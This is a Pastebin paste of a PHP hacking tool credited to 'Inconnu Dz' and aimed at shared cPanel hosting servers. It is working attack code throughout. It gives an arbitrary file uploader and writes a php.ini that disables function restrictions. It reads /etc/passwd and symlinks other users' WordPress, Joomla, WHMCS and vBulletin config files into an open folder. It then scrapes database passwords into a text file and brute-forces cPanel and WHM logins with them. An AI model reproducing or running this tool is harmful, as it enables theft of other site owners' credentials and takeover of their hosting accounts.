Advertisement
Inconnu-Dz

inconnu.php

May 7th, 2016
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.31 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>//# Inconnu Dz #//</title>
  4. </head>
  5. <center><font color=#00FF66 size=5 face=tahoma>Symlink Bypass CPanel & WHM panel Cracker By Inconnu Dz</font></center>
  6. <center><font color=green size=4><<<<<<<<<<<<<<<<<<<<<<<<<<<<<font color=red size=4><<<<<>>>>><font color=white size=4>>>>>>>>>>>>>>>>>>>>>>>>>>>>></font></center>
  7. <center><font color=orenge size=4 face=tahoma>Inconnu Dz || Algeria Attacker</font></center><br>
  8. <br></br>
  9. <?php
  10. #_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _#
  11. #     this script coded By Inconnu Dz           #
  12. #fb : https://www.facebook.com/ghost.attack.dz  #
  13. #           thenks to All My Frinds :D          #
  14. #_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _#                                              
  15. ?>
  16. <center><font color=red size=5 face=tahoma>Server Search :<br></font><br>
  17. <?php //#Inconnu Dz#//
  18. echo " <center> </center>";
  19. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  20. echo "<font color=#00AA99 face=tahoma>Server IP : </font> <font color=orange face=tahoma>".gethostbyname($_SERVER["HTTP_HOST"])."
  21. </font><font color=orange size=4 face=tahoma> [</span>
  22. <a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\"><font color=orenge>Bing Search</font></a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\"><font color=orenge>Zone-H Search</font></a>]<center></font>";
  23.  ?><br> </center> <br><br>
  24. <center> <?php
  25. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  26. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  27. if( $_POST['_upl'] == "Upload" ) {
  28.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>DONE :3 !!!</b><br><br>'; }
  29.     else { echo '<b>Upload Failed :( !!!</b>'; }
  30.     echo '<font color=orenge size=5>==> http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/".$_FILES['file']['name']."";
  31. }
  32. ?> </center>
  33. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
  34. <form method=post>
  35. <input type=submit name=ini value="Generate PHP.ini" /></form>
  36. <?php
  37. if(isset($_POST['ini']))
  38. {
  39.  
  40. $i=fopen('php.ini','w');
  41. $rr=" disable_functions=none ";
  42. fwrite($i,$rr);
  43. $link="<a href=php.ini><font color=white size=2 ><u>Cick here :D</u></font></a>";
  44. echo $link;
  45.  
  46. }
  47. ?>
  48. <?php
  49. //////////////////////////////////////
  50. /////    mass symlink       ////////
  51. //////////////////////////////////////
  52. ?>
  53. <form method=post>
  54. <input type=submit name="usre" value="Get User & Config" /></form>
  55.  
  56.  
  57.  
  58.  
  59. <?php
  60. if(isset($_POST['usre'])){
  61. ?><form method=post>
  62. <textarea rows=20 cols=40 name=user><?php $user=file("/etc/passwd");
  63. {
  64. $str=explode(":",$user);
  65. echo $str[0]."\n";
  66. }
  67.  
  68. ?></textarea><br><br>
  69. <input type=submit name=dz value="config" /></form>
  70. <?php } ?>
  71. <?php
  72. error_reporting(0);
  73. echo "<font color=red size=2 face=\"comic sans ms\">";
  74. if(isset($_POST['dz']))
  75. {
  76.  
  77. $dir=mkdir('DZ',0777);
  78. $i = " Options all \n DirectoryIndex DZ.html \n Require None \n Satisfy Any";
  79. $f = fopen('DZ/.htaccess','w');
  80.  
  81. fwrite($f,$i);
  82. $consym="<a href=DZ/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  83. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  84.  
  85. $usr=explode("\n",$_POST['user']);
  86.  
  87. foreach($usr as $uss )
  88. {
  89. $us=trim($uss);
  90.  
  91. $i="DZ/";
  92. symlink('/home/'.$us.'/public_html/wp-config.php',$i.$us.'..wp-config');
  93. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$i.$us.'..word-wp');
  94. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$i.$us.'..wpblog');
  95. symlink('/home/'.$us.'/public_html/configuration.php',$i.$us.'..joomla-or-whmcs');
  96. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$i.$us.'..joomla');
  97. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$i.$us.'..vbinc');
  98. symlink('/home/'.$us.'/public_html/includes/config.php',$i.$us.'..vb');
  99. symlink('/home/'.$us.'/public_html/conf_global.php',$i.$us.'..conf_global');
  100. symlink('/home/'.$us.'/public_html/inc/config.php',$i.$us.'..inc');
  101. symlink('/home/'.$us.'/public_html/config.php',$i.$us.'..config');
  102. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$i.$us.'..sites');
  103. symlink('/home/'.$us.'/public_html/whm/configuration.php',$i.$us.'..whm');
  104. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$i.$us.'..whmcs');
  105. symlink('/home/'.$us.'/public_html/support/configuration.php',$i.$us.'..supporwhmcs');
  106. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$i.$us.'..WHM');
  107. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$i.$us.'..whmc');
  108. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$i.$us.'..WHMcs');
  109. symlink('/home/'.$us.'/public_html/support/configuration.php',$i.$us.'..whmcsupp');
  110. symlink('/home/'.$us.'/public_html/clients/configuration.php',$i.$us.'..whmcs-cli');
  111. symlink('/home/'.$us.'/public_html/client/configuration.php',$i.$us.'..whmcs-cl');
  112. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$i.$us.'..whmcs-CL');
  113. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$i.$us.'..whmcs-Cl');
  114. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$i.$us.'..whmcs-csup');
  115. symlink('/home/'.$us.'/public_html/billing/configuration.php',$i.$us.'..whmcs-bill');
  116. symlink('/home/'.$us.'/public_html/admin/config.php',$i.$us.'..admin-conf');
  117. }
  118. }
  119. ?>
  120. <form method=post>
  121. <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
  122. <?php
  123. error_reporting(0);
  124. set_time_limit(0);
  125. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  126. {
  127.  
  128. $ar0=explode($marqueurDebutLien, $text);
  129. $ar1=explode($marqueurFinLien, $ar0[1]);
  130. $ar=trim($ar1[0]);
  131. return $ar;
  132. }
  133.  
  134. if(isset($_POST['sm']))
  135.  
  136. {
  137.  
  138. echo '<font color=orange>OK++';
  139.  
  140. $ffile=fopen('DZ.txt','a+');
  141.  
  142.  
  143. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/DZ/";
  144. $re=$r;
  145. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  146.  
  147. $users=file("/etc/passwd");
  148. foreach($users as $user)
  149. {
  150.  
  151. $str=explode(":",$user);
  152. $usersss=$str[0];
  153. foreach($confi as $co)
  154. {
  155.  
  156.  
  157. $uurl=$re.$usersss.$co;
  158. $uel=$uurl;
  159.  
  160. $ch = curl_init();
  161.  
  162. curl_setopt($ch, CURLOPT_URL, $uel);
  163. curl_setopt($ch, CURLOPT_HEADER, 1);
  164. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  165. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  166. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  167. $result['EXE'] = curl_exec($ch);
  168. curl_close($ch);
  169. $uxl=$result['EXE'];
  170.  
  171.  
  172. if($uxl && preg_match('/table_prefix/i',$uxl))
  173. {
  174.  
  175. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Wordpress </font></td></tr></table>";
  176.  
  177.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  178. if(!empty($dbp))
  179. $pass=$dbp."\n";
  180. fwrite($ffile,$pass);
  181.  
  182. }
  183. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  184. {
  185.  
  186. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Whmcs </font></td></tr></table>";
  187.  
  188. echo $dbp=entre2v2($uxl,"db_password = '","';");
  189. if(!empty($dbp))
  190. $pass=$dbp."\n";
  191. fwrite($ffile,$pass);
  192.  
  193. }
  194.  
  195.  
  196. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  197. {
  198.  
  199. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Joomla </font></td></tr></table>";
  200.  
  201. echo $db=entre2v2($uxl,"password = '","';");
  202. if(!empty($db))
  203. $pass=$db."\n";
  204. fwrite($ffile,$pass);
  205. }
  206. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  207. {
  208.  
  209. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is vbulletin </font></td></tr></table>";
  210.  
  211. echo $db=entre2v2($uxl,"password'] = '","';");
  212. if(!empty($db))
  213. $pass=$db."\n";
  214. fwrite($ffile,$pass);
  215.  
  216. }
  217. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  218. {
  219.  
  220. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  221.  
  222. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  223. if(!empty($db))
  224. $pass=$db."\n";
  225. fwrite($ffile,$pass);
  226. }
  227. elseif($uxl && preg_match('/dbpass/i',$uxl))
  228. {
  229.  
  230. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  231.  
  232. echo $db=entre2v2($uxl,"dbpass = '","';");
  233. if(!empty($db))
  234. $pass=$db."\n";
  235. fwrite($ffile,$pass);
  236. }
  237. elseif($uxl && preg_match('/dbpass/i',$uxl))
  238. {
  239.  
  240. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  241.  
  242. echo $db=entre2v2($uxl,"dbpass = '","';");
  243. if(!empty($db))
  244. $pass=$db."\n";
  245. fwrite($ffile,$pass);
  246.  
  247. }
  248. elseif($uxl && preg_match('/dbpass/i',$uxl))
  249. {
  250.  
  251. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  252.  
  253. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  254. if(!empty($db))
  255. $pass=$db."\n";
  256. fwrite($ffile,$pass);
  257. }
  258.  
  259.  
  260. }
  261. }
  262. }
  263. ?>
  264. <form method=post>
  265. <input type=submit name=cpanel value="CPanel & WHM panel cracker"><p>
  266. <?php
  267.  
  268. if(isset($_POST['cpanel']))
  269. {
  270. ?>
  271. <form method=post><div align=center><table>
  272. <font color=orange size=4> ==> </font> <select name="op"> <option name="op" value="cp">CPanel</option>
  273. <option name="op" value="whm">WHMPanel</option></table><p>
  274. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  275. foreach($users as $user)
  276. {
  277. $str=explode(":",$user);
  278. echo $str[0]."\n";
  279. }
  280.  
  281. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  282. <?php
  283.  
  284. $d=getcwd()."/DZ.txt";
  285. $pf=file($d);
  286. foreach($pf as $rt)
  287. {
  288. $str=explode('\n',$rt);
  289. echo trim($str[0])."\n";
  290. } ?></textarea><p>
  291. <input type=submit name=cpanelcracking value="crack"></form>
  292. <?php
  293. }
  294. ?>
  295.  
  296.  
  297.  
  298.  
  299. <?php
  300. error_reporting(0);
  301. $connect_timeout=5;
  302. set_time_limit(0);
  303.  
  304. $userl=$_POST['usernames'];
  305. $passl=$_POST['passwords'];
  306. $attack=$_POST['op'];
  307. $target = "localhost";
  308.  
  309. if(isset($_POST['cpanelcracking']))
  310. {
  311. if($userl!=="" && $passl!=="")
  312. {
  313. if($_POST["op"]=="cp")
  314. {
  315. $cracked=$_POST['crack'];
  316. @fopen($cracked,'a');
  317. echo "Attacking CPanel....please wait till the end of process \n";
  318.  
  319.  
  320. }
  321. elseif($_POST["op"]=="whm")
  322. {
  323. @fopen($cracked,'a');
  324. echo "Attacking WHM panel....please wait till the end of process";
  325.  
  326. }
  327.  
  328. function cpanel($host,$user,$pass,$timeout){
  329. $ch = curl_init();
  330. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  331. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  332. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  333. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  334. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  335. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  336. $data = curl_exec($ch);
  337. if ( curl_errno($ch) == 0 ){
  338. echo "<table width=100% ><tr><td align=center><b></font>
  339.  
  340. <font color=red size=2> Cracked </font>
  341.  
  342. <font color=white size=2> Username is </font>
  343.  
  344. <font color=green size=2> $user</font>
  345.  
  346. <font color=red size=2> & </font>
  347.  
  348. <font color=white size=2> Password is </font>
  349.  
  350. <font color=green size=2> $pass </font>
  351.  
  352. </font></b></td></tr></table>";
  353.  
  354. }
  355.  
  356. curl_close($ch);}
  357.  
  358. $userlist=explode("\n",$userl);
  359. $passlist=explode("\n",$passl);
  360.  
  361. if ($attack == "cp")
  362. {
  363. foreach ($userlist as $user) {
  364. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  365. $finaluser = trim($user);
  366. foreach ($passlist as $password ) {
  367. $finalpass = trim($password);
  368.  
  369.  
  370. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  371.  
  372. }
  373. }
  374.  
  375. }
  376.  
  377. function whm($host,$user,$pass,$timeout){
  378. $ch = curl_init();
  379. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  380. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  381. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  382. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  383. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  384. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  385. $data = curl_exec($ch);
  386. if ( curl_errno($ch) == 0 ){
  387. echo "<table width=100% ><tr><td align=center><b></font>
  388.  
  389. <font color=red size=2> Cracked </font>
  390.  
  391. <font color=white size=2> Username is </font>
  392.  
  393. <font color=green size=2> $user</font>
  394.  
  395. <font color=red size=2> & </font>
  396.  
  397. <font color=white size=2> Password is </font>
  398.  
  399. <font color=green size=2> $pass </font>
  400.  
  401. </font></b></td></tr></table>";
  402.  
  403.  
  404.  
  405.  
  406. }
  407.  
  408.  
  409. curl_close($ch);}
  410. $userlist=explode("\n",$userl);
  411. $passlist=explode("\n",$passl);
  412.  
  413. if ($attack == "whm")
  414. {
  415. foreach ($userlist as $user) {
  416. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
  417. $finaluser = trim($user);
  418. foreach ($passlist as $password ) {
  419. $finalpass = trim($password);
  420.  
  421. whm($target,$finaluser,$finalpass,$connect_timeout);
  422. }
  423. }
  424. }
  425. }
  426. elseif($userl=="")
  427. {
  428. echo "you have left user list field empty";
  429.  
  430. }
  431. elseif($passl=="")
  432. {
  433.  
  434. echo "please put passwords in paasword list field";
  435. }
  436. }
  437. ?>
  438. <br>
  439. <br><br><br></br><div align=center><font color=#ff9933 font size=4><marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="30" width="70%">
  440. <span class="footerlink"><br><br><br><font color=orenge> Greetz to </font> <font color=red> : </font>Pri Nce <font color=red> & </font> Matrix Dz <font color=red> & </font> Abdelhak Ghazi <font color=red> & </font> Cyborg Dz <font color=red> & </font> Mr Abdou  <font color=red> & </font> Vendita Dz <font color=red> & </font> Achraf Dz <font color=red> & </font> Dxman Benz <font color=red> & </font> and All Dz Hacker :D<span>
  441. </marquee><br></font></div><div align=center><table width=50%><br>
  442. <center><font color=orange size=4>https://www.facebook.com/ghost.attack.dz</font></center>
  443. <br><center><font color=red>______________________________________________________________________________________________________________________________________</font></center>
  444. <br><center><font color="orenge" face="verdana,arial" size=-1>~ Coded By Inconnu Dz ~</font></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement